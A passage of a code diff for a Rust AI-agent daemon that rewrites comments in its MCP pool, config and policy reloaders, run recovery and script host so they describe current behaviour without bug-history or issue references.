@@ -53,9 +51,8 @@ impl Applied {
 
 /// Applies `[limits]` and `[title]` to a live world.
 ///
-/// Built once at boot and consulted wherever the daemon has a freshly reloaded
-/// config and the world in hand: the spawner, and the reloader that pages a run
-/// back in.
+/// One per daemon, consulted wherever there is a freshly reloaded config and
+/// the world in hand: the spawner, and the reloader that pages a run back in.
 pub struct LiveLimits {
     /// The prompt hub, which holds its own timeout rather than living in the
     /// world.
@@ -124,8 +121,8 @@ impl LiveLimits {
         ecs.insert_resource(leviath_runtime::fanout::FanOutBudget(
             config.limits.max_agents_per_run,
         ));
-        // The half of the title split that used to be stuck at boot: the
-        // dispatcher and the spawner now read the same document.
+        // The dispatcher's half of the title split; the spawner reads the same
+        // document a moment later.
         ecs.insert_resource(leviath_runtime::title::TitleSettings(config.title.clone()));
 
         // Read when a prompt opens, so a prompt already waiting keeps the

--- a/crates/leviath-cli/src/daemon/mcp_pool.rs
+++ b/crates/leviath-cli/src/daemon/mcp_pool.rs
@@ -33,11 +33,10 @@ pub struct McpPool {
     /// pool: where MCP OAuth grants are kept, and which credential-shaped
     /// variables a server's `${VAR}` headers may interpolate.
     ///
-    /// Behind a lock because they were boot copies, and the docs said
-    /// otherwise: naming a variable in `allow_env_vars` was supposed to take
-    /// effect on the next load, and for an MCP server it took effect on the
-    /// next daemon restart. `mcp_reload` writes them on each config reconcile,
-    /// and they are read when a server is connected.
+    /// Behind a lock rather than copied in at construction: `mcp_reload` writes
+    /// them on each config reconcile and they are read when a server is
+    /// connected, which is what makes naming a variable in `allow_env_vars`
+    /// take effect on the next load rather than the next daemon restart.
     security: StdMutex<PoolSecurity>,
     /// Per-run leases on per-agent servers (see [`Self::lease_blueprint`]).
     /// Same `std` mutex discipline as `connected`: held briefly, never across
@@ -45,9 +44,8 @@ pub struct McpPool {
     leases: StdMutex<LeaseTable>,
     /// How long a per-agent server may sit with zero leasing runs before its
     /// connection (and, for stdio servers, its child process) is torn down.
-    /// Zero disables disconnection - the pre-lease behavior, where every
-    /// server any blueprint ever declared stayed connected for the daemon's
-    /// life.
+    /// Zero disables disconnection, so every server any blueprint declares
+    /// stays connected for the daemon's life.
     idle_disconnect: std::time::Duration,
 }
 
@@ -244,13 +242,13 @@ impl McpPool {
     /// Seed every global server in `servers` with the defs it contributed to
     /// `defs`, worked out from `owners`.
     ///
-    /// The alternative is [`seed`](Self::seed)'s empty vec, which is what the
-    /// startup path used while the global servers' defs lived in a separate
-    /// list beside the pool. Filing each server's own defs under its signature
-    /// makes [`cached_defs_for`](Self::cached_defs_for) the single answer to
-    /// "what does this set of servers advertise", for the global set as much as
-    /// a blueprint's - which is what lets the global set change under a running
-    /// daemon without a second list to keep in step.
+    /// The alternative is [`seed`](Self::seed)'s empty vec, which leaves the
+    /// global defs to live in a list beside the pool. Filing each server's own
+    /// defs under its signature makes
+    /// [`cached_defs_for`](Self::cached_defs_for) the single answer to "what
+    /// does this set of servers advertise", for the global set as much as a
+    /// blueprint's - which is what lets the global set change under a running
+    /// daemon with no second list to keep in step.
     pub(crate) fn seed_all(
         &self,
         servers: &[MCPServerConfig],
@@ -431,11 +429,11 @@ impl McpPool {
     /// that one.
     ///
     /// The client is taken before any pool bookkeeping goes. The other order
-    /// (forget the lease row and the cached defs, then ask the executor) lost
-    /// the server for the daemon's life whenever the executor kept it: the
-    /// next tick found no lease row and returned early, so nothing ever asked
-    /// again, the child process never got `shutdown()`, and the tool stayed
-    /// routable for a run that no longer leased it.
+    /// (forget the lease row and the cached defs, then ask the executor) leaks
+    /// the server for the daemon's life whenever the executor keeps it: the
+    /// next tick finds no lease row and returns early, so nothing asks again,
+    /// the child process never gets `shutdown()`, and the tool stays routable
+    /// for a run that no longer leases it.
     async fn disconnect_if_still_idle(
         &self,
         sig: &str,
@@ -484,8 +482,8 @@ impl McpPool {
     }
 
     /// Whether the shared executor can still dispatch `tool`. The
-    /// advertisement and the connection are separate records, and the bug this
-    /// distinguishes is one going stale without the other.
+    /// advertisement and the connection are separate records, and this is what
+    /// tells apart one going stale without the other.
     #[cfg(test)]
     pub(crate) async fn routes(&self, tool: &str) -> bool {
         self.shared.lock().await.route(tool).is_ok()
@@ -682,8 +680,7 @@ pub(crate) fn parse_blueprint_mcp_servers(manifest_toml: &str) -> Vec<MCPServerC
     // `toml::from_str`, not `manifest_toml.parse::<toml::Value>()`. In toml 1.x
     // `FromStr for Value` parses a single *value*, not a document - so a real
     // manifest starting with `[agent]` reads as an array literal followed by
-    // junk and fails. It still compiles, so the change is silent; the tests are
-    // what caught it.
+    // junk and fails. Both spellings compile, so swapping them is silent.
     let Ok(value) = toml::from_str::<toml::Value>(manifest_toml) else {
         return Vec::new();
     };
@@ -1062,12 +1059,10 @@ mod tests {
     }
 
     /// A call in flight when the idle tick fires keeps the server exactly as
-    /// it was: still leased, still cached, still routable. The next tick,
-    /// once the call has let go, tears it down. Before the fix the first tick
-    /// dropped the lease row and the cached defs and only then found the
-    /// executor would not give the client up, so the second tick found no
-    /// row, returned early, and the server (and its child process) lived for
-    /// the daemon's life while its tool stayed routable.
+    /// it was: still leased, still cached, still routable. The next tick, once
+    /// the call has let go, tears it down. Dropping the lease row before the
+    /// executor has given the client up is what would leak the server and its
+    /// child process for the daemon's life.
     #[tokio::test]
     async fn an_in_flight_call_postpones_the_idle_disconnect() {
         with_tracing(|| {});

--- a/crates/leviath-cli/src/daemon/mcp_reload.rs
+++ b/crates/leviath-cli/src/daemon/mcp_reload.rs
@@ -1,19 +1,16 @@
 //! Keeping the daemon's global `[[mcp_servers]]` in step with `config.toml`.
 //!
-//! The global servers were connected once, by `ToolRegistry::build` at boot,
-//! and the tools they advertise were cloned into the spawner as a plain
-//! `Vec<Tool>` that nothing ever wrote to again. So `lev mcp add` and
-//! `POST /api/mcp/servers` wrote the file and stopped there: the server was in
-//! the config, `lev mcp list` showed it, and no run could call it until the
-//! daemon was restarted - with nothing anywhere saying so.
+//! `lev mcp add` and `POST /api/mcp/servers` write `[[mcp_servers]]` and stop
+//! there, so this module reconciles the connected set against the reloaded
+//! config before each spawn: a server added after boot is callable by the next
+//! run, not by the next daemon. The pool beside it already knows how to connect
+//! a server lazily, dedupe it by signature and tear an unused one down, so the
+//! work here is deciding *what* changed and letting the pool do the rest.
 //!
-//! This module reconciles that set against the reloaded config before each
-//! spawn. The pool beside it already knows how to connect a server lazily,
-//! dedupe it by signature and tear an unused one down, so the work here is
-//! deciding *what* changed and letting the pool do the rest. The advertised
-//! defs are then read back off the pool's own cache rather than kept in a
-//! second list, because two lists of the same thing is how the old one went
-//! stale.
+//! The advertised defs are read back off the pool's own cache rather than kept
+//! in a second list here. Two lists of the same tools is how a def list falls
+//! out of step, and one built from the config would claim a server that failed
+//! to start.
 
 use std::collections::HashSet;
 use std::sync::{Arc, Mutex, PoisonError};
@@ -318,10 +315,8 @@ mod tests {
         .await
     }
 
-    /// The hole this module exists for. `lev mcp add` and `POST
-    /// /api/mcp/servers` write `[[mcp_servers]]` and nothing else, so the
-    /// server was in the config, listed by `lev mcp list`, and uncallable by
-    /// every run until someone restarted the daemon - with nothing saying so.
+    /// A server written into `[[mcp_servers]]` after boot is connected and
+    /// advertised on the next reconcile, so the next run can call it.
     #[tokio::test]
     async fn a_server_added_after_boot_is_callable_by_the_next_run() {
         with_tracing(|| {});
@@ -347,8 +342,7 @@ mod tests {
     }
 
     /// And the other direction: a server taken out of the config stops being
-    /// offered, rather than lingering for the daemon's life because its defs
-    /// were cloned into the spawner at boot.
+    /// offered, rather than lingering for the daemon's life.
     #[tokio::test]
     async fn a_server_removed_from_the_config_is_gone_from_the_next_run() {
         with_tracing(|| {});
@@ -450,11 +444,10 @@ mod tests {
         .await;
     }
 
-    /// `[security] allow_env_vars` was a boot copy inside the pool, while
-    /// `daemon.md` said it took effect on the next load. Naming a variable
-    /// there now reaches an MCP server's `${VAR}` header: the server
-    /// reconnects because the allowlist that resolved its headers moved, even
-    /// though its own entry did not.
+    /// Naming a variable in `[security] allow_env_vars` reaches an MCP server's
+    /// `${VAR}` header on the next load: the server reconnects because the
+    /// allowlist that resolved its headers moved, even though its own entry did
+    /// not.
     ///
     /// `MY_MCP_TOKEN` is credential-shaped, so it is refused until it is
     /// named - which is what makes the first half a real "before" rather than

--- a/crates/leviath-cli/src/daemon/policy_reload.rs
+++ b/crates/leviath-cli/src/daemon/policy_reload.rs
@@ -2,21 +2,22 @@
 //!
 //! Two files decide whether a tainted outbound call is allowed: `policy.toml`
 //! (the static allowlist and the `[mcp_overrides]`) and `rules/*.rhai` (the
-//! scripted rules consulted after it). Both were read once at daemon startup
-//! and installed as world resources, and the scripted half was worse than
-//! boot-only in an invisible way: the sources are read into a closure, so an
-//! edited rule kept answering with the text it had at boot.
+//! scripted rules consulted after it). Both are installed as world resources,
+//! and both are re-read here so `lev policy add` lands on the next run: it
+//! writes `policy.toml` and prints the rule it wrote, and a gate that goes on
+//! blocking the call that rule permits has nothing to say why.
 //!
-//! That put `lev policy add` in a bad spot. It writes `policy.toml` and prints
-//! the rule it wrote, the gate goes on blocking the call the rule was written
-//! to permit, and nothing says why. The fix is the one the config reloader
-//! beside this module already uses for `config.toml`: stat the files, reload
-//! when they moved, compare, and swap the world resource before the next run
-//! resolves anything.
+//! The scripted half needs this more than the static one, and in a way no
+//! "restart the daemon" advice covers: a rule's sources are read into a
+//! closure, so an installed checker keeps answering with the text it was built
+//! from no matter how often the file is edited. Only a rebuild picks up a
+//! change.
 //!
-//! These are not `config.toml`, so the reloader cannot carry them: they live
-//! under the platform config directory (`~/.config/leviath` on Linux) and get
-//! their own mtime check here.
+//! The shape is the config reloader's, beside this module: stat the files,
+//! reload when they moved, compare, and swap the world resource before the next
+//! run resolves anything. They cannot ride that reloader itself - they are not
+//! `config.toml`, they live under the platform config directory
+//! (`~/.config/leviath` on Linux), so they get their own mtime check here.
 
 use std::path::{Path, PathBuf};
 use std::sync::{Arc, Mutex, MutexGuard, PoisonError};
@@ -353,9 +354,8 @@ mod tests {
         assert!(!reload.refresh().any());
     }
 
-    /// The bug: `lev policy add` writes the rule, prints it, and the gate goes
-    /// on blocking the call it was written to permit until the daemon is
-    /// killed.
+    /// A rule `lev policy add` wrote after boot is in force on the next run,
+    /// with no daemon restart.
     #[test]
     fn a_rule_added_after_boot_reaches_the_world() {
         let dir = tempfile::tempdir().unwrap();
@@ -384,7 +384,7 @@ mod tests {
         );
     }
 
-    /// The scripted half, which was stale in a way no restart advice covered:
+    /// The scripted half, where an edit only lands if the engine is rebuilt:
     /// the sources live inside the compiled closure.
     #[test]
     fn an_edited_rule_script_reaches_the_world() {

--- a/crates/leviath-cli/src/daemon/provider_reload.rs
+++ b/crates/leviath-cli/src/daemon/provider_reload.rs
@@ -1,20 +1,19 @@
 //! Rebuilding the daemon's provider registry when `config.toml` changes.
 //!
-//! The registry is built once at boot from the config's keys, base URLs and
-//! `[model_providers]` entries, and was then fixed for the life of the
-//! process. Everything a person does to change where their runs go - `lev
-//! setup`, `PUT /api/config`, editing the file - writes that file and nothing
-//! else, so a user who moved off a provider whose credits had run out watched
-//! every new run go to it anyway, and the only thing that helped was killing
-//! the daemon. The config reloader beside this module already re-read the
-//! file for spawn-time settings; it deliberately stopped short of the
-//! registry, and this is the piece that finishes the job.
+//! The registry is built from the config's keys, base URLs and
+//! `[model_providers]` entries, and everything a person does to change where
+//! their runs go - `lev setup`, `PUT /api/config`, editing the file by hand -
+//! writes that file and nothing else. So the registry follows the file: move
+//! off a provider whose credits have run out and the next run routes somewhere
+//! else, with no daemon restart. The config reloader beside this module covers
+//! the spawn-time settings out of the same file; this is the provider half.
 //!
 //! The check is on the credentials themselves rather than the file's mtime: a
 //! save that changed a tool permission is not a reason to rebuild providers,
 //! and a rebuild that dropped a provider mid-flight would be worse than the
-//! bug. What changed is also *which* providers changed, so the circuit breaker
-//! can forget the failures that belong to a key the user has since replaced.
+//! staleness it cures. The comparison also names *which* providers changed, so
+//! the circuit breaker can forget the failures that belong to a key the user
+//! has since replaced.
 
 use std::sync::{Arc, Mutex, PoisonError};
 
@@ -100,8 +99,8 @@ impl ProviderReload {
             return Vec::new();
         }
         // The script layer is carried over rather than rebuilt: it follows the
-        // config through its own source (issue #533) and holds the `.rhai`
-        // providers it has already compiled.
+        // config through its own source, and holds the `.rhai` providers it has
+        // already compiled.
         let built = leviath_runtime::provider_creds::build_provider_registry_with(
             &creds,
             self.build_client,
@@ -356,7 +355,7 @@ mod tests {
     fn a_rebuild_keeps_the_script_provider_layer() {
         // A `.rhai` provider the daemon has already compiled must survive a
         // key change elsewhere: rebuilding the layer would drop it, and the
-        // layer follows the config on its own anyway (issue #533).
+        // layer follows the config on its own anyway.
         let config = config_with_key("sk-ant");
         let dir = tempfile::tempdir().unwrap();
         let layer =

--- a/crates/leviath-cli/src/daemon/readiness.rs
+++ b/crates/leviath-cli/src/daemon/readiness.rs
@@ -12,9 +12,9 @@ use std::time::Duration;
 ///
 /// Windows gets longer. Starting the daemon there has to bind a named pipe and
 /// detach into a job object, and under a supervisor opening many sessions at
-/// once those serialise: the 5s that is generous on Unix was regularly missed,
-/// leaving sessions `runtime-missing` and the control pipe reporting "All pipe
-/// instances are busy" (os error 231). The cost of the longer window is paid
+/// once those serialise: the 5s that is generous on Unix is regularly missed
+/// there, leaving sessions `runtime-missing` and the control pipe reporting
+/// "All pipe instances are busy" (os error 231). The longer window is paid for
 /// only by a start that would otherwise have failed - the poll returns as soon
 /// as the daemon answers, and a healthy one answers in ~20ms on either
 /// platform.
@@ -33,8 +33,8 @@ const MAX_DELAY: Duration = Duration::from_millis(50);
 /// 2ms and doubling to a 50ms ceiling. Returns whether it flipped in time.
 ///
 /// The backoff is the point. The daemon boots in about 20ms, so a fixed 50ms
-/// tick spent more time waiting than the daemon spent starting - it was most
-/// of the measured 97ms cold `lev run`. Doubling to the same 50ms ceiling
+/// tick spends more time waiting than the daemon spends starting: it was most
+/// of a measured 97ms cold `lev run`. Doubling to the same 50ms ceiling
 /// leaves the slow path (a daemon that genuinely takes seconds) unchanged
 /// while making the common path cost one 2ms sleep.
 ///

--- a/crates/leviath-cli/src/daemon/recovery.rs
+++ b/crates/leviath-cli/src/daemon/recovery.rs
@@ -23,7 +23,7 @@
 //! not persisted - they block inside the transient tool-worker turn, so on restart
 //! they take the ordinary re-inference path and the model simply re-asks.
 //!
-//! ## Tool-call delivery contract (issue #96)
+//! ## Tool-call delivery contract
 //!
 //! A tool batch in flight at the crash is **replayed, not re-executed**. Dispatch
 //! journals the batch (a `ToolBatch` record) before its side effects can start,
@@ -273,8 +273,8 @@ fn mark_crashed(run_dir: &Path, meta: RunMeta, reason: &str, now_secs: i64) {
 /// `Cancelled` is deliberately not here. A cancelled run keeps its journal, its
 /// context regions, its stage and iteration, and its parked fan-out state, so
 /// there is something to carry on from and `lev resume` should be able to reach
-/// it (#576). A `Complete` run has nothing left to do, and an `Error` one should
-/// be read before it is continued.
+/// it. A `Complete` run has nothing left to do, and an `Error` one should be
+/// read before it is continued.
 ///
 /// This governs paging a run back in on demand. Startup recovery has its own
 /// filter in `triage_restores`, which still drops cancelled runs: somebody
@@ -392,9 +392,9 @@ fn reload_one(
 
     // Put the per-stage ledger back too. `build_agent_for_reload` seeds one
     // all-zero record per blueprint stage, and the persist tick rewrites
-    // `stages.json` whole, so skipping this did not merely fail to restore the
-    // run's stage history - the next tick wrote zeros over the file that held
-    // it, while `meta.json`'s run totals went on looking correct (issue #415).
+    // `stages.json` whole, so skipping this would not merely fail to restore
+    // the run's stage history - the next tick writes zeros over the file that
+    // holds it, while `meta.json`'s run totals go on looking correct.
     // No file (a run from before the ledger, or one that stopped before its
     // first persist) leaves the seeded records as they are.
     let mut stage_records = crate::runstate::read_stages_index_from(run_dir);
@@ -436,8 +436,8 @@ fn reload_one(
     // so the run returns as a bare `Paused` and the next persist tick computes
     // `waiting_on` from markers that are no longer there and writes `null`
     // over the recorded reason - the same shape as the stage ledger above,
-    // where not restoring did not merely lose the value but erased the file
-    // that held it. The run is not re-dispatched while paused, so nothing
+    // where not restoring does not merely lose the value but erases the file
+    // that holds it. The run is not re-dispatched while paused, so nothing
     // would recompute it either.
     if let Some(leviath_core::run_meta::WaitReason::NeedsSetup { blocker, remedy }) =
         &meta.waiting_on
@@ -455,8 +455,8 @@ fn reload_one(
     // reached the window: replay what the journal recorded - real results for
     // completed calls, verify-first errors for interrupted ones - so the
     // re-issued inference sees what already ran instead of re-executing the
-    // batch's side effects (issue #96). fold() only surfaces a batch that is
-    // genuinely unapplied (same iteration, turn absent from the window).
+    // batch's side effects. fold() only surfaces a batch that is genuinely
+    // unapplied (same iteration, turn absent from the window).
     if let Some(batch) = pending_batch {
         leviath_runtime::restore::restore_pending_batch(
             world.world_mut(),
@@ -485,7 +485,7 @@ fn reload_one(
     }
 
     // Carry the run's productivity flags across the restart, so a resumed run
-    // doesn't report itself as having modified nothing (issue #107).
+    // doesn't report itself as having modified nothing.
     {
         let mut flags = world
             .world_mut()
@@ -511,8 +511,8 @@ fn reload_one(
     // If this run was parked at a stage-boundary interaction point (e.g.
     // plan_approval), re-present it in the *waiting* state rather than the default
     // `Active` + `ReadyToInfer` restore - so the open prompt survives the restart
-    // instead of being dropped and re-inferred (issue #38). A missing/malformed
-    // sidecar, or a blueprint that no longer matches, leaves the default restore.
+    // instead of being dropped and re-inferred. A missing/malformed sidecar, or
+    // a blueprint that no longer matches, leaves the default restore.
     if let Some(state) =
         std::fs::read_to_string(run_dir.join(leviath_core::files::INTERACTIONS_FILE))
             .ok()
@@ -688,14 +688,14 @@ mod tests {
             depth,
             max_child_depth,
             // Non-default on purpose: proves reload restores the run's
-            // productivity flags rather than starting them over (issue #107).
+            // productivity flags rather than starting them over.
             flags: leviath_core::run_meta::RunFlags {
                 modified_files: vec!["src/a.rs".to_string()],
                 modified_file_count: 1,
                 // Contradicts what this manifest would compute on a fresh
                 // spawn (it advertises `write_file`), which is the point: the
                 // flags describe how the run actually executed, so the
-                // persisted answer wins over a re-derived one (issue #192).
+                // persisted answer wins over a re-derived one.
                 no_output_tools: true,
                 ..Default::default()
             },
@@ -894,9 +894,9 @@ mod tests {
         (world, entity.entity())
     }
 
-    /// An unattended run comes back unattended. Dropping `--yolo` on reload was
-    /// meant as the safe side, but it converted a running unattended job into
-    /// one parked on a prompt nobody was watching for (issue #184).
+    /// An unattended run comes back unattended. Dropping `--yolo` on reload
+    /// looks like the safe side, but it converts a running unattended job into
+    /// one parked on a prompt nobody is watching for.
     #[tokio::test]
     async fn reload_keeps_an_unattended_run_unattended() {
         let agent = agent_dir();
@@ -967,12 +967,12 @@ mod tests {
     /// A reload replays the `--model` the run was launched with, and only that.
     ///
     /// `meta.model` is the label the entry stage resolved to, and it is set on
-    /// every run that has started. It used to be handed back as the override,
-    /// so a run launched with no `--model` came back with every stage pinned
-    /// to its first stage's pair. Here the label names a provider that is not
+    /// every run that has started. Handing it back as the override would bring
+    /// a run launched with no `--model` back with every stage pinned to its
+    /// first stage's pair. Here the label names a provider that is not
     /// registered any more, the way a run resolved on a since-removed key
-    /// would: as an override that refused the reload outright; as a label it
-    /// is history, and the stages resolve afresh from the blueprint.
+    /// would: as an override it refuses the reload outright; as a label it is
+    /// history, and the stages resolve afresh from the blueprint.
     #[tokio::test]
     async fn reload_replays_the_launch_override_not_the_resolved_label() {
         let agent = agent_dir();
@@ -1126,7 +1126,7 @@ mod tests {
         assert_eq!(flags.0.modified_files, vec!["src/a.rs".to_string()]);
         assert_eq!(flags.0.modified_file_count, 1);
         // Including the capability answer, which the blueprint on disk would
-        // now compute differently - the run is judged as it ran (issue #192).
+        // compute differently - the run is judged as it ran.
         assert!(flags.0.no_output_tools);
         // The answer the run had already given is put back on the entity. Were
         // it not, the next persist tick would write a meta.json without it and
@@ -1326,7 +1326,7 @@ mod tests {
             .clone()
     }
 
-    /// The #96 crash-resume path end to end: a batch was dispatched (journaled),
+    /// The crash-resume path end to end: a batch was dispatched (journaled),
     /// one call completed (journaled), one didn't, and the daemon died before
     /// the batch applied. Reload replays the recorded result and synthesizes a
     /// verify-first error for the lost one - and the agent re-infers from there
@@ -1573,8 +1573,8 @@ mod tests {
         assert_eq!(restored.len(), 1);
         let (run_id, entity) = &restored[0];
         assert_eq!(run_id, "run-await");
-        // Re-armed in the *waiting* state (not the default Active), so no inference
-        // re-issues and the open prompt isn't dropped - the issue #38 fix.
+        // Re-armed in the *waiting* state (not the default Active), so no
+        // inference re-issues and the open prompt isn't dropped.
         assert_eq!(world.agent_status(*entity), Some(AgentStatus::Waiting));
         assert!(
             world
@@ -1643,9 +1643,9 @@ mod tests {
         assert_eq!(order, vec!["zzz-active", "aaa-blocked"]);
     }
 
-    /// #576: cancelling stops a run, it does not end it. Everything needed to
-    /// carry on is on disk, so `lev resume` has to be able to reach it, which
-    /// means it has to page back in.
+    /// Cancelling stops a run, it does not end it. Everything needed to carry
+    /// on is on disk, so `lev resume` has to be able to reach it, which means
+    /// it has to page back in.
     #[tokio::test]
     async fn reload_run_pages_in_a_cancelled_run_but_not_a_finished_one() {
         let agent = agent_dir();
@@ -2057,11 +2057,10 @@ mod tests {
         );
     }
 
-    /// A restart used to bring every stage back at zero: nothing rebuilt the
-    /// ledger from `stages.json`, so the blueprint-seeded (all-zero) one was
-    /// written straight over the real file on the next persist tick, and the
-    /// run's whole per-stage history went with it while `meta.json` still
-    /// looked healthy (issue #415).
+    /// A restart rebuilds the stage ledger from `stages.json`. Without it the
+    /// blueprint-seeded (all-zero) ledger goes straight over the real file on
+    /// the next persist tick, taking the run's whole per-stage history with it
+    /// while `meta.json` still looks healthy.
     /// A run parked until the machine is fixed keeps its reason across a
     /// daemon restart.
     ///
@@ -2138,7 +2137,7 @@ mod tests {
         );
         // The ledger as the run left it: `analyze` ran and finished, the run
         // stopped in `implement`, `review` was never reached. The trailing
-        // record names a stage this blueprint no longer has.
+        // record names a stage this blueprint does not have.
         let mut analyze = StageRecord::new("analyze".to_string(), 0);
         analyze.status = StageRunStatus::Complete;
         analyze.entered = true;
@@ -2158,7 +2157,7 @@ mod tests {
             since: None,
         });
         // One closed stay, priced, so the money survives the reload rather than
-        // restarting from zero the way #415 restarted the tokens.
+        // restarting from zero the way the tokens would.
         analyze.begin_visit(10);
         analyze.record_call(
             &leviath_core::run_meta::StageCall {
@@ -2218,8 +2217,8 @@ mod tests {
             .world()
             .get::<StageLedger>(restored[0].1.entity())
             .expect("a reloaded agent carries a stage ledger");
-        // One record per blueprint stage, in blueprint order: the record for a
-        // stage that no longer exists is dropped rather than appended.
+        // One record per blueprint stage, in blueprint order: a record for a
+        // stage the blueprint does not have is dropped rather than appended.
         let names: Vec<&str> = ledger.0.iter().map(|r| r.name.as_str()).collect();
         assert_eq!(names, vec!["analyze", "implement", "review"]);
         assert_eq!(ledger.0[0].prompt_tokens, 1_234);
@@ -2230,8 +2229,8 @@ mod tests {
         // closed at the run's `updated_at` (222), not carried on to now (999).
         assert_eq!(ledger.0[0].active_runtime_secs(999), 8);
         assert_eq!(ledger.0[1].active_runtime_secs(999), 3 + 22);
-        // The money comes back with the tokens. Restarting a stage's cost at
-        // zero on a reload is the same bug #415 was about, one column over.
+        // The money comes back with the tokens: a stage's cost restarted at
+        // zero on a reload is the same loss as its tokens, one column over.
         assert_eq!(ledger.0[0].cost_usd, Some(0.5));
         assert!(ledger.0[0].cost_is_exact);
         assert_eq!(ledger.0[0].visits.len(), 1);
@@ -2313,8 +2312,8 @@ mod tests {
         assert!(restored.is_empty()); // all skipped, none fatal
 
         // The un-reloadable run is recorded as crashed rather than left claiming
-        // it is still running (issue #109) - `lev ps` and the dashboard would
-        // otherwise show a live run that no longer exists.
+        // it is still running - `lev ps` and the dashboard would otherwise show
+        // a live run that does not exist.
         let meta: RunMeta = serde_json::from_str(
             &std::fs::read_to_string(runs.path().join("run-badpath").join("meta.json")).unwrap(),
         )
@@ -2364,8 +2363,8 @@ mod tests {
     fn is_finished_covers_all_statuses() {
         assert!(is_finished(&RunStatus::Complete));
         assert!(is_finished(&RunStatus::Error));
-        // The point of #576: a cancelled run stopped, it did not end, and
-        // everything it needs to carry on is still on disk.
+        // A cancelled run stopped, it did not end, and everything it needs to
+        // carry on is still on disk.
         assert!(!is_finished(&RunStatus::Cancelled));
         assert!(!is_finished(&RunStatus::Running));
         assert!(!is_finished(&RunStatus::WaitingInput));

--- a/crates/leviath-cli/src/daemon/sandbox_manager.rs
+++ b/crates/leviath-cli/src/daemon/sandbox_manager.rs
@@ -259,7 +259,7 @@ fn real_run(argv: &[String]) -> Result<(), String> {
     };
     // `docker run`/`docker rm` are bookkeeping the operator never watches, so
     // they get no console window on Windows - which is what `child_command`
-    // arranges and a bare `Command::new` did not.
+    // arranges and a bare `Command::new` does not.
     let mut cmd = leviath_sys::child_command(program);
     cmd.args(args);
     let output = cmd.output().map_err(|e| e.to_string())?;

--- a/crates/leviath-cli/src/daemon/script_host.rs
+++ b/crates/leviath-cli/src/daemon/script_host.rs
@@ -178,8 +178,7 @@ impl DaemonScriptHost {
     ///
     /// The same function the built-in file tools use, so a script's
     /// `write_file` and the agent's `write_file` cannot disagree about what a
-    /// path is allowed to be. It used to be a line-for-line copy, error
-    /// strings included.
+    /// path is allowed to be, error strings included.
     fn resolve_in_workdir(&self, requested: &str) -> Result<PathBuf, String> {
         leviath_tools::resolve_within(requested, &self.workdir, leviath_core::resolves_within)
             .map_err(|e| e.to_string())
@@ -287,7 +286,7 @@ impl ScriptHost for DaemonScriptHost {
             return Err(denied("write_file"));
         }
         // Same rule as the built-in write tools: never let `create_dir_all`
-        // resurrect a workspace that disappeared mid-run (issue #107).
+        // resurrect a workspace that disappeared mid-run.
         if !std::fs::metadata(&self.workdir).is_ok_and(|m| m.is_dir()) {
             return Err(format!(
                 "workspace '{}' is no longer accessible",
@@ -393,8 +392,8 @@ static HTTP_CLIENT: std::sync::LazyLock<reqwest::blocking::Client> =
 /// reqwest's own `Display` for a refused redirect is "error following redirect
 /// for url (…)" - it never mentions the reason, which for us is the whole point:
 /// "refused to follow redirect: private address" and "too many redirects" are
-/// different problems with different fixes, and both were reaching the script
-/// author as the same opaque sentence.
+/// different problems with different fixes, and without the chain they reach
+/// the script author as the same opaque sentence.
 fn error_chain(e: &(dyn std::error::Error + 'static)) -> String {
     leviath_providers::rhai_provider::host::error_chain(e)
 }
@@ -472,9 +471,9 @@ impl RealScriptIo {
         build: &dyn Fn() -> reqwest::blocking::RequestBuilder,
         max: u64,
     ) -> Result<String, String> {
-        // One `send()` used to be the whole story here, and a single HTTP/2
-        // stream error therefore lost the page for good: a research run cited
-        // two primary sources it had never opened because of exactly this.
+        // Retried, because a single HTTP/2 stream error would otherwise lose
+        // the page for good and a research run would cite a source it never
+        // opened.
         let resp = Self::send_with_retry(url, build)?;
         let status = resp.status();
         let content_type = resp
@@ -632,7 +631,7 @@ fn oversized_body_message(content_length: Option<u64>, max: u64) -> Option<Strin
 pub(crate) fn cap_script_io(mut s: String) -> String {
     if s.len() > MAX_SCRIPT_IO_BYTES {
         // Cut on a char boundary - a raw byte cut-off lands mid-character on
-        // multi-byte text and panics (the shape of issue #109).
+        // multi-byte text and panics, and a panic here can take the daemon out.
         s.truncate(floor_char_boundary(&s, MAX_SCRIPT_IO_BYTES));
         s.push_str("\n[...truncated by leviath: response exceeded 900 KB]");
     }
@@ -666,7 +665,7 @@ impl ScriptIo for RealScriptIo {
         // tool uses. `try_current` rather than `current`: a blocking thread can
         // outlive runtime shutdown, and `current` would *panic* there - and a
         // panic inside a Rhai native call is the shape that can abort the
-        // daemon (issue #109).
+        // whole daemon.
         let Ok(handle) = tokio::runtime::Handle::try_current() else {
             return Err("shell is unavailable: no tokio runtime on this thread".to_string());
         };
@@ -779,8 +778,8 @@ pub(crate) fn combine_shell_output(stdout: &[u8], stderr: &[u8]) -> String {
 mod tests {
 
     /// A server that drops the first connection without answering, then serves
-    /// normally. Reproduces the "the socket did not work this time" shape that
-    /// used to lose a source outright.
+    /// normally: the "the socket did not work this time" shape that costs a
+    /// source outright when there is no retry.
     ///
     /// A blocking listener over exactly two connections, so the spawned body
     /// *returns*. An `accept` loop that runs forever leaves its own closing
@@ -1195,8 +1194,8 @@ mod tests {
             .expect("a permitted write is not clamped");
     }
 
-    /// Issue #289. `allow.write_file` answers "may this write at all"; it does
-    /// not answer "may it write *there*". This host's `write_file` is
+    /// `allow.write_file` answers "may this write at all"; it does not answer
+    /// "may it write *there*". This host's `write_file` is
     /// workdir-confined, so its `shell()` redirects are too - otherwise a script
     /// with writes permitted could put a file anywhere on the host.
     #[test]
@@ -1218,8 +1217,8 @@ mod tests {
 
     #[test]
     fn script_write_refuses_a_deleted_workspace() {
-        // Same rule as the built-in write tools (#107): a script may not
-        // resurrect a workspace that disappeared out from under the run.
+        // Same rule as the built-in write tools: a script may not resurrect a
+        // workspace that disappeared out from under the run.
         let dir = tempfile::tempdir().unwrap();
         let workdir = dir.path().join("gone");
         let io = RecordingIo::arc();
@@ -1938,9 +1937,9 @@ mod tests {
     #[test]
     fn real_shell_off_a_runtime_errors_instead_of_panicking() {
         // A blocking thread can outlive runtime shutdown; `Handle::current()`
-        // would panic there, and a panic inside a Rhai native call aborted the
-        // whole daemon before issue #109 was fixed. A plain `std::thread` is
-        // the same "no reactor on this thread" condition.
+        // would panic there, and a panic inside a Rhai native call can abort
+        // the whole daemon. A plain `std::thread` is the same "no reactor on
+        // this thread" condition.
         let dir = tempfile::tempdir().unwrap();
         let workdir = dir.path().to_path_buf();
         let err = std::thread::spawn(move || {

--- a/crates/leviath-cli/src/daemon/script_host/http_limits.rs
+++ b/crates/leviath-cli/src/daemon/script_host/http_limits.rs
